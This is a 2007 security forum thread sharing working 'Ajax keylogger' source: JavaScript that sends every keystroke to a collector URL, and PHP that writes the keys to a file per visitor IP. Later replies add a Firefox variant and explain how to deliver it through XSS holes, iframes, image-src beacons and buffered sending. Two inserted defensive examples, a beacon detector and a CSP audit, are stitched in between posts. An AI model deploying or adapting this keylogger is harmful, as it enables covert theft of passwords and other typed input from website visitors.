Government Security
Network Security Resources

Ajax Keylogger.

16 replies to this topic

#1 METAHUMAN

METAHUMAN

    Private First Class

  • Members
  • 28 posts

Posted 08 April 2007 - 05:44 AM

Not my stuff. Found elsewhere. Posting here.

Keylogger.JS
function whichButton(event)
{
var keya = "";
keya = event.keyCode;
makeRequest('http://site.com/keylogger.php?iambr=' + keya);
}

function makeRequest(url)
{
var httpRequest;

if (window.XMLHttpRequest)
{ // Mozilla, Safari, ...
httpRequest = new XMLHttpRequest();
if (httpRequest.overrideMimeType) {
httpRequest.overrideMimeType('text/xml');
}
} 
else if (window.ActiveXObject)
{ // IE
try
{
httpRequest = new ActiveXObject("Msxml2.XMLHTTP");
} 
catch (e) {
try {
httpRequest = new ActiveXObject("Microsoft.XMLHTTP");
} 
catch (e) {}
}
}

if (!httpRequest)
{
alert('Giving up :( Cannot create an XMLHTTP instance');
return false;
}
httpRequest.onreadystatechange = function() { alertContents(httpRequest); };
httpRequest.open('GET', url, true);
httpRequest.send(null);
}

function alertContents(httpRequest)
{
if (httpRequest.readyState == 4) {
if (httpRequest.status == 200) {
}
else
{
alert('There was a problem with the request.');
}
}
}

Keylogger.PHP
<?php
$_GET['iambr'];
$file = fopen($_SERVER['REMOTE_ADDR'] . ".txt","a");
fwrite($file,$_GET['iambr'] . '||');
fclose($file);
?>

index.htm
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="JavaScript" SRC="keylogger.js"></SCRIPT>
</head>
<body onkeyup="whichButton(event)">
<p><b>Note:</b> Make sure the right frame has focus when trying this example!</p>
<p>Press a key on your keyboard. An alert box will alert the unicode of the key pressed.</p>
</body>
</html>

(:
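
Added example, not part of the original post: the script above issues one GET per key release, so a proxy or web log shows bursts of requests to one endpoint whose single query value is a key code or one character. The detector below looks for that shape; the log format, host names and thresholds are constructed assumptions.

```javascript
// Added example, not code from the thread.
// Constructed proxy log, one request per line: "<epoch-seconds> <client-ip> <url>".
const SAMPLE_LOG = [
  '1000 10.0.0.5 http://collector.example/keylogger.php?iambr=72',
  '1000 10.0.0.9 http://intranet.example/search?q=quarterly+report',
  '1001 10.0.0.5 http://collector.example/keylogger.php?iambr=69',
  '1001 10.0.0.5 http://collector.example/keylogger.php?iambr=76',
  '1002 10.0.0.9 http://intranet.example/list?page=2',
  '1002 10.0.0.5 http://collector.example/keylogger.php?iambr=76',
  '1003 10.0.0.5 http://collector.example/keylogger.php?iambr=79',
  '1004 10.0.0.5 http://collector.example/keylogger.php?iambr=13',
  '1030 10.0.0.9 http://intranet.example/list?page=3',
];

// Flags (client, endpoint, parameter) triples that receive a burst of GETs whose
// single query value is only a few characters long: the shape of one request
// per keyup carrying a key code or a single character.
function findKeystrokeBeacons(lines, { windowSec = 10, minHits = 5, maxValueLen = 3 } = {}) {
  const buckets = new Map();
  for (const line of lines) {
    const [ts, client, rawUrl] = line.trim().split(/\s+/);
    let url;
    try { url = new URL(rawUrl); } catch (e) { continue; } // skip malformed lines
    const params = [...url.searchParams];
    if (params.length !== 1) continue;
    const [name, value] = params[0];
    if (value.length === 0 || value.length > maxValueLen) continue;
    const key = `${client} ${url.origin}${url.pathname}?${name}=`;
    if (!buckets.has(key)) buckets.set(key, []);
    buckets.get(key).push(Number(ts));
  }
  const alerts = [];
  for (const [key, times] of buckets) {
    times.sort((a, b) => a - b);
    let start = 0, burst = 0;
    for (let end = 0; end < times.length; end++) {
      while (times[end] - times[start] > windowSec) start++; // slide the window
      burst = Math.max(burst, end - start + 1);
    }
    if (burst >= minHits) alerts.push({ key, burst });
  }
  return alerts;
}

console.log(findKeystrokeBeacons(SAMPLE_LOG));
```

Short pagination or ID parameters can trip the same heuristic, so tune `minHits` and `windowSec` against normal traffic before alerting on it.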

#2 raif

raif

    Staff Sergeant

  • Sergeant Major
  • 275 posts

Posted 08 April 2007 - 06:34 AM

Small improvement. It will now do keylogging for Firefox (and probably other Netscape/Mozilla-based browsers). And because of the String.fromCharCode it will log the actual letter rather than the ASCII code for it.

function whichButton(e)
{
var keya = "";
var isNetscape = (navigator.appName.indexOf("Netscape") != -1);
var keya = (isNetscape) ? String.fromCharCode(e.which) : String.fromCharCode(e.keyCode);
makeRequest('http://site.com/keylogger.php?iambr=' + keya);
}


#3 setthesun

setthesun

    Sergeant First Class

  • Sergeant Major
  • 574 posts

Posted 10 April 2007 - 12:07 AM

I hope you know that it's not gonna work when it's under another domain and will throw a security error in IE and FF. But you can still use it under your own domain.

setthesun me = new setthesun();

#4 raif

raif

    Staff Sergeant

  • Sergeant Major
  • 275 posts

Posted 10 April 2007 - 06:50 AM

Or you can inject the JavaScript through an XSS hole and use it on someone else's domain. But the same domain policy for XMLHttpRequest will prevent it from working on more than one at a time.

#5 setthesun

setthesun

    Sergeant First Class

  • Sergeant Major
  • 574 posts

Posted 10 April 2007 - 07:24 AM

Nope, it's not going to work because of the same origin policy, and not using a buffer before sending keys is a crazy idea! Slow and a bandwidth / process killer.

So basically this is only useful if you've got a website which is already controlled by you.

You can make this work cross-domain though. Simply create a new image and modify "src" to your server with the required query string (which includes the recorded keystrokes), that's it.

And it's a good idea to send this request after a buffer and/or onclose() or a similar action.

setthesun me = new setthesun();

#6 raif

raif

    Staff Sergeant

  • Sergeant Major
  • 275 posts

Posted 10 April 2007 - 11:55 AM

You can make it work on a domain you don't control if you have an iframe that keeps the keylogger going as long as they are on the same domain. And the buffer is a good idea too. Have it send the buffered keystrokes onMouseUp, like when they click on a link. Just inject the JavaScript code to create the iframe into an XSS hole (whether persistent or reflected). And even if this doesn't work on a site that you don't control (which I think it will..) you can find a site where you can inject XSS into a database and just inject all the code in there and it'll work. But I think I'm going to try this out just to make sure that it does work.
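
Added example, not part of any post in this thread: the channels discussed in the posts above (XMLHttpRequest, an image `src` beacon, an injected iframe, and the injected script itself) are each governed by a Content-Security-Policy directive. The audit below takes a CSP header value and returns the directives that still leave one of those channels open to an arbitrary origin; the sample policies are constructed, and host allowlists are not evaluated further.

```javascript
// Added example, not code from the thread. Directive fallbacks follow CSP Level 3.
const FALLBACK = {
  'connect-src': ['connect-src', 'default-src'],          // XMLHttpRequest / fetch
  'img-src': ['img-src', 'default-src'],                  // new Image().src beacon
  'frame-src': ['frame-src', 'child-src', 'default-src'], // injected iframe
  'script-src': ['script-src', 'default-src'],            // the injected script itself
};

function parseCsp(header) {
  const policy = Object.create(null);
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A repeated directive is ignored; only the first occurrence counts.
    if (!(name in policy)) policy[name] = tokens.slice(1).map(t => t.toLowerCase());
  }
  return policy;
}

function effectiveSources(policy, directive) {
  for (const name of FALLBACK[directive]) {
    if (name in policy) return policy[name];
  }
  return null; // directive and all fallbacks absent: unrestricted
}

function allowsAnyOrigin(sources) {
  return sources === null || sources.some(s => s === '*' || s === 'https:' || s === 'http:');
}

function allowsInlineScript(sources) {
  if (sources === null) return true;
  // Browsers ignore 'unsafe-inline' when a nonce or hash source is present.
  const strict = sources.some(s => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return sources.includes("'unsafe-inline'") && !strict;
}

// Returns the directives that leave one of the thread's channels open.
function auditCsp(header) {
  const policy = parseCsp(header);
  const open = ['connect-src', 'img-src', 'frame-src']
    .filter(d => allowsAnyOrigin(effectiveSources(policy, d)));
  if (allowsInlineScript(effectiveSources(policy, 'script-src'))) open.push('script-src');
  return open;
}

// Constructed sample policies.
console.log(auditCsp("default-src 'self'"));
console.log(auditCsp("default-src 'self'; img-src *; script-src 'self' 'unsafe-inline'"));
```

An empty result means none of the four channels is wide open under that policy; a non-empty one names the directive to tighten.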

#7 Guest_Dennis_*

Guest_Dennis_*
  • Guests

Posted 24 April 2007 - 09:25 AM

Think the realtime ajax logging is a bit too much :) It would be cool if it could send it after pressing the submit button. Maybe I'll look into it later if I have the time.

#8 t0tum

t0tum

    Private

  • Members
  • 1 posts

Posted 11 July 2007 - 10:00 AM

Small improvement. It will now do keylogging for Firefox (and probably other Netscape/Mozilla-based browsers). And because of the String.fromCharCode it will log the actual letter rather than the ASCII code for it.


And what would be the one for IE, or preferably both?

#9 Guest_berdo_*

Guest_berdo_*
  • Guests

Posted 31 July 2007 - 05:41 AM

Hi guys.
Maybe you have to improve your keylogger because it only catches some letters when you write http://flash-back.caucasus.net/genkey/Keyl...php?iambr=' <something here.
Waiting for your reply. :rolleyes: if you can do this. ;;)

#10 Guest_berdo_*

Guest_berdo_*
  • Guests

Posted 31 July 2007 - 05:45 AM

And this actually works in Mozilla using this way /keylogger.php?iambr='here you can write something. :D

#11 Guest_lomanasq_*

Guest_lomanasq_*
  • Guests

Posted 02 August 2007 - 10:15 PM

spam us then spam him

info removed

#12 Guest_stillbirth_*

Guest_stillbirth_*
  • Guests

Posted 11 August 2007 - 04:10 AM

w0ow very thx dear :ph34r: :ph34r: :ph34r:

#13 gametricker

gametricker

    Private

  • Members
  • 3 posts

Posted 22 January 2008 - 04:43 PM

wow, this is amazing.

I have a "method" of showing it on cross-domain, sort of kind of. :ph34r: , if anyone would want to know, they first have to help me develop a way to record button clicks :D

Cheers,

Edward

#14 extreme

extreme

    Specialist

  • Sergeant Major
  • 615 posts

Posted 23 January 2008 - 08:59 AM

What's the purpose of cross domain keylogging??? It still has to be inside of an iframe/frame that is located on your website, which is very possible to do..

It is more interesting to find out how to send key using javascript :/

BTW, check out "onkeypress" or something like that since it should return the printable character, and not its ASCII value
ONLY UNITY SAVES THE SERBS

#15 Kaiba

Kaiba

    Private First Class

  • Members
  • 55 posts

Posted 22 July 2008 - 11:50 AM

However, using a frame within another website is forbidden in posts or e-mails, at least for good famous ones.
good plan + hard work + deep faith = great success




